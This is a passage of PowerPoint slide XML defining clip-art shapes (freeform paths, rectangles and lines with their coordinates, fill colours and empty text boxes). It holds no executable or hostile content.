                  <a:pt x="668" y="977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636" y="977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621" y="977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607" y="977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="593" y="977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="567" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="544" y="974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532" y="974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502" y="972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493" y="972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483" y="971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474" y="970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465" y="969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432" y="964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417" y="960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372" y="950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342" y="942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="308" y="932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291" y="928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273" y="923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254" y="918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236" y="914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197" y="903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179" y="897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109" y="870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54" y="16"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10249" name="Freeform 330"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2943225" y="7953375"/>
            <a:ext cx="252412" cy="163513"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 112"/>
              <a:gd name="T1" fmla="*/ 0 h 72"/>
              <a:gd name="T2" fmla="*/ 0 w 112"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 72"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 112"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 72"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 112"/>
              <a:gd name="T7" fmla="*/ 0 h 72"/>
              <a:gd name="T8" fmla="*/ 2147483647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43" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="33CCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10250" name="Rectangle 331"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071812" y="7427913"/>
            <a:ext cx="117475" cy="531812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33CCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:no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251" name="Rectangle 332"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2944812" y="7578725"/>
            <a:ext cx="160338" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33CCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:no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252" name="Rectangle 333"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2944812" y="7578725"/>
            <a:ext cx="160338" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solid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253" name="Freeform 334"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2943225" y="7419975"/>
            <a:ext cx="252412" cy="163513"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 112"/>
              <a:gd name="T1" fmla="*/ 0 h 72"/>
              <a:gd name="T2" fmla="*/ 0 w 112"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 72"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 112"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 72"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 112"/>
              <a:gd name="T7" fmla="*/ 0 h 72"/>
              <a:gd name="T8" fmla="*/ 2147483647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43" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="33CCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10254" name="Freeform 335"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2943225" y="7419975"/>
            <a:ext cx="252412" cy="163513"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 112"/>
              <a:gd name="T1" fmla="*/ 0 h 72"/>
              <a:gd name="T2" fmla="*/ 0 w 112"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 72"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 112"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 72"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 112"/>
              <a:gd name="T7" fmla="*/ 0 h 72"/>
              <a:gd name="T8" fmla="*/ 2147483647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43" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10255" name="Line 336"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3195637" y="7434263"/>
            <a:ext cx="3175" cy="519112"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10256" name="Line 337"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3105150" y="7953375"/>
            <a:ext cx="90487" cy="158750"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10257" name="Rectangle 338"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2968625" y="7648575"/>
            <a:ext cx="103187" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:no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258" name="Rectangle 339"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2968625" y="7648575"/>
            <a:ext cx="103187" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solid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259" name="Rectangle 340"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2984500" y="7740650"/>
            <a:ext cx="77787" cy="109538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:no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260" name="Freeform 341"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354137" y="7429500"/>
            <a:ext cx="561975" cy="469900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T27" fmla="*/ 0 h 208"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T29" fmla="*/ 0 h 208"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T31" fmla="*/ 0 h 208"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T33" fmla="*/ 0 h 208"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T56" fmla="*/ 0 w 249"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 208"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 20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49"/>
              <a:gd name="T118" fmla="*/ 0 h 208"/>
              <a:gd name="T119" fmla="*/ 249 w 249"/>
              <a:gd name="T120" fmla="*/ 208 h 20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49" h="208">
                <a:moveTo>
                  <a:pt x="68" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244" y="169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="27"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10261" name="Freeform 342"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1549400" y="7462838"/>
            <a:ext cx="179387" cy="206375"/>
